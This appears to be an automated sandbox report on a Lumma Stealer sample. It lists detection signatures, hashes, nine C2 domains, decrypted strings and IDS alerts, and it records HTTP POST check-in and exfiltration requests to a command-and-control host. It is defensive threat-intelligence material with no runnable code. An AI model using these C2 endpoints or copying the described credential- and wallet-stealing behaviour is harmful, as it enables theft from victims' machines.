Windows Analysis Report
6GNqkkKY0j.exe

Overview

General Information

Sample name: 6GNqkkKY0j.exe (renamed because the original name is a hash value)
Original sample name: 1778a174a471fdec99c35907f2267d30.exe
Analysis ID: 1580874
MD5: 1778a174a471fdec99c35907f2267d30
SHA1: 4867feba972b8cab9eb49ce4421b88193bff2d0b
SHA256: eb58db1db82012e283903925b9f45c73ff3427ef522c853bc286ed9e395924a9
Tags: exe, user-abuse_ch

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

(classification chart; categories: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; scale: clean, suspicious, malicious)

  • System is w10x64
  • 6GNqkkKY0j.exe (PID: 3500 cmdline: "C:\Users\user\Desktop\6GNqkkKY0j.exe" MD5: 1778A174A471FDEC99C35907F2267D30)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{
  "C2 url": [
    "bashfulacid.lat",
    "wordyfindy.lat",
    "observerfry.lat",
    "tentabatte.lat",
    "shapestickyr.lat",
    "curverpluch.lat",
    "talkynicer.lat",
    "slipperyloo.lat",
    "manyrestro.lat"
  ],
  "Build id": "LOGS11--LiveTraffic"
}
Source | Rule | Description | Author
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security

Source | Rule | Description | Author
00000000.00000003.3002739984.00000000013E6000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.3020004985.00000000013E6000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.3023883651.00000000013E7000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.3024388435.00000000013E7000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.2695354440.00000000013E6000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
(4 more entries not shown)

No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-26T12:45:10.635190+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49704 | 23.55.153.106 | 443 | TCP
2024-12-26T12:45:13.220468+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49705 | 172.67.157.254 | 443 | TCP
2024-12-26T12:45:17.364608+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49706 | 172.67.157.254 | 443 | TCP
2024-12-26T12:45:39.157288+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49743 | 172.67.157.254 | 443 | TCP
2024-12-26T12:46:09.245417+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49809 | 172.67.157.254 | 443 | TCP
2024-12-26T12:46:39.778813+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49874 | 172.67.157.254 | 443 | TCP
2024-12-26T12:46:41.837953+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49880 | 172.67.157.254 | 443 | TCP
2024-12-26T12:46:44.081164+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49886 | 172.67.157.254 | 443 | TCP
2024-12-26T12:46:45.403758+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49888 | 172.67.157.254 | 443 | TCP
2024-12-26T12:45:16.034199+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49705 | 172.67.157.254 | 443 | TCP
2024-12-26T12:45:37.418008+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49706 | 172.67.157.254 | 443 | TCP
2024-12-26T12:45:16.034199+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.5 | 49705 | 172.67.157.254 | 443 | TCP
2024-12-26T12:45:37.418008+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.5 | 49706 | 172.67.157.254 | 443 | TCP
2024-12-26T12:45:08.672427+0100 | 2058480 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 54923 | 1.1.1.1 | 53 | UDP
2024-12-26T12:45:08.327464+0100 | 2058484 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 59766 | 1.1.1.1 | 53 | UDP
2024-12-26T12:45:07.895129+0100 | 2058492 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 52215 | 1.1.1.1 | 53 | UDP
2024-12-26T12:45:08.042861+0100 | 2058500 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 50742 | 1.1.1.1 | 53 | UDP
2024-12-26T12:45:07.748559+0100 | 2058502 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 52446 | 1.1.1.1 | 53 | UDP
2024-12-26T12:45:08.182814+0100 | 2058510 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 57456 | 1.1.1.1 | 53 | UDP
2024-12-26T12:45:08.511094+0100 | 2058512 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 60516 | 1.1.1.1 | 53 | UDP
2024-12-26T12:45:07.607341+0100 | 2058514 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 60595 | 1.1.1.1 | 53 | UDP
2024-12-26T12:46:07.424139+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49743 | 172.67.157.254 | 443 | TCP
2024-12-26T12:46:38.126992+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49809 | 172.67.157.254 | 443 | TCP
2024-12-26T12:45:11.455460+0100 | 2858666 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49704 | 23.55.153.106 | 443 | TCP

AV Detection

Source: 6GNqkkKY0j.exe | Avira: detected
Source: https://lev-tolstoi.com/pi9 | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com:443/apizchhhv.default-release/key4.dbPK | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/ee | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/9 | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/4 | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/A | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/Q | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/api4& | Avira URL Cloud: Label: malware
Source: 6GNqkkKY0j.exe.3500.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["bashfulacid.lat", "wordyfindy.lat", "observerfry.lat", "tentabatte.lat", "shapestickyr.lat", "curverpluch.lat", "talkynicer.lat", "slipperyloo.lat", "manyrestro.lat"], "Build id": "LOGS11--LiveTraffic"}
Source: 6GNqkkKY0j.exe | Virustotal: Detection: 52%
Source: 6GNqkkKY0j.exe | ReversingLabs: Detection: 55%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 6GNqkkKY0j.exe | Joe Sandbox ML: detected
Source: 00000000.00000002.3076015732.00000000002F1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: bashfulacid.lat
Source: 00000000.00000002.3076015732.00000000002F1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: tentabatte.lat
Source: 00000000.00000002.3076015732.00000000002F1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: curverpluch.lat
Source: 00000000.00000002.3076015732.00000000002F1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: talkynicer.lat
Source: 00000000.00000002.3076015732.00000000002F1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: shapestickyr.lat
Source: 00000000.00000002.3076015732.00000000002F1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: manyrestro.lat
Source: 00000000.00000002.3076015732.00000000002F1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: slipperyloo.lat
Source: 00000000.00000002.3076015732.00000000002F1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: wordyfindy.lat
Source: 00000000.00000002.3076015732.00000000002F1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: observerfry.lat
Source: 00000000.00000002.3076015732.00000000002F1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.3076015732.00000000002F1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.3076015732.00000000002F1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000002.3076015732.00000000002F1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.3076015732.00000000002F1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000002.3076015732.00000000002F1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: LOGS11--LiveTraffic
Source: 6GNqkkKY0j.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49743 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49809 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49874 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49880 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49886 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49888 version: TLS 1.2

Networking

Source: Network traffic | Suricata IDS: 2058480 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bashfulacid .lat) : 192.168.2.5:54923 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058514 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wordyfindy .lat) : 192.168.2.5:60595 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058502 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (slipperyloo .lat) : 192.168.2.5:52446 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058510 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (talkynicer .lat) : 192.168.2.5:57456 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058500 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shapestickyr .lat) : 192.168.2.5:50742 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058512 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tentabatte .lat) : 192.168.2.5:60516 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058492 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (manyrestro .lat) : 192.168.2.5:52215 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058484 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (curverpluch .lat) : 192.168.2.5:59766 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49705 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:49704 -> 23.55.153.106:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49706 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49706 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49743 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49809 -> 172.67.157.254:443
Source: Malware configuration extractor | URLs: bashfulacid.lat
Source: Malware configuration extractor | URLs: wordyfindy.lat
Source: Malware configuration extractor | URLs: observerfry.lat
Source: Malware configuration extractor | URLs: tentabatte.lat
Source: Malware configuration extractor | URLs: shapestickyr.lat
Source: Malware configuration extractor | URLs: curverpluch.lat
Source: Malware configuration extractor | URLs: talkynicer.lat
Source: Malware configuration extractor | URLs: slipperyloo.lat
Source: Malware configuration extractor | URLs: manyrestro.lat
Source: Joe Sandbox View | IP Address: 172.67.157.254
Source: Joe Sandbox View | IP Address: 23.55.153.106
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49743 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 23.55.153.106:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49809 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49880 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49886 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49874 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49888 -> 172.67.157.254:443
Source: global traffic | HTTP traffic detected:
    GET /profiles/76561199724331900 HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Host: steamcommunity.com
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 53
    Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=YXHVYIT847QELZEBS
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 12835
    Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=T5B0SDDXPB8XPSJITU
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 15083
    Host: lev-tolstoi.com
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected:
    GET /profiles/76561199724331900 HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Host: steamcommunity.com
Source: global traffic | DNS traffic detected: DNS query: observerfry.lat
Source: global traffic | DNS traffic detected: DNS query: wordyfindy.lat
Source: global traffic | DNS traffic detected: DNS query: slipperyloo.lat
Source: global traffic | DNS traffic detected: DNS query: manyrestro.lat
Source: global traffic | DNS traffic detected: DNS query: shapestickyr.lat
Source: global traffic | DNS traffic detected: DNS query: talkynicer.lat
Source: global traffic | DNS traffic detected: DNS query: curverpluch.lat
Source: global traffic | DNS traffic detected: DNS query: tentabatte.lat
Source: global traffic | DNS traffic detected: DNS query: bashfulacid.lat
Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic | DNS traffic detected: DNS query: lev-tolstoi.com
Source: unknown | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: lev-tolstoi.com
Source: 6GNqkkKY0j.exe, 00000000.00000003.3003017131.0000000005D63000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: 6GNqkkKY0j.exe, 00000000.00000003.3003017131.0000000005D63000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: 6GNqkkKY0j.exe, 00000000.00000003.3003017131.0000000005D63000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: 6GNqkkKY0j.exe, 00000000.00000003.3003017131.0000000005D63000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: 6GNqkkKY0j.exe, 00000000.00000003.3003017131.0000000005D63000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: 6GNqkkKY0j.exe, 00000000.00000003.3003017131.0000000005D63000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: 6GNqkkKY0j.exe, 00000000.00000003.3003017131.0000000005D63000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: 6GNqkkKY0j.exe, 00000000.00000003.3003017131.0000000005D63000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: 6GNqkkKY0j.exe, 00000000.00000003.3003017131.0000000005D63000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181266459.000000000142F000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013AB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181266459.000000000142F000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013AB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181266459.000000000142F000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013AB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: 6GNqkkKY0j.exe, 00000000.00000003.3003017131.0000000005D63000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: 6GNqkkKY0j.exe, 00000000.00000003.3003017131.0000000005D63000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: 6GNqkkKY0j.exe, 00000000.00000003.2398410423.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398278526.0000000005CEE000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398339446.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181266459.000000000142F000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013AB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: 6GNqkkKY0j.exe, 00000000.00000003.3005561903.0000000005D3F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: 6GNqkkKY0j.exe, 00000000.00000003.3005561903.0000000005D3F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: 6GNqkkKY0j.exe, 00000000.00000003.2398410423.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398278526.0000000005CEE000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398339446.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 6GNqkkKY0j.exe, 00000000.00000003.2398410423.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398278526.0000000005CEE000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398339446.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 6GNqkkKY0j.exe, 00000000.00000003.2398410423.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398278526.0000000005CEE000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398339446.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181266459.000000000142F000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013AB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
Source: 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181266459.000000000142F000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013AB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
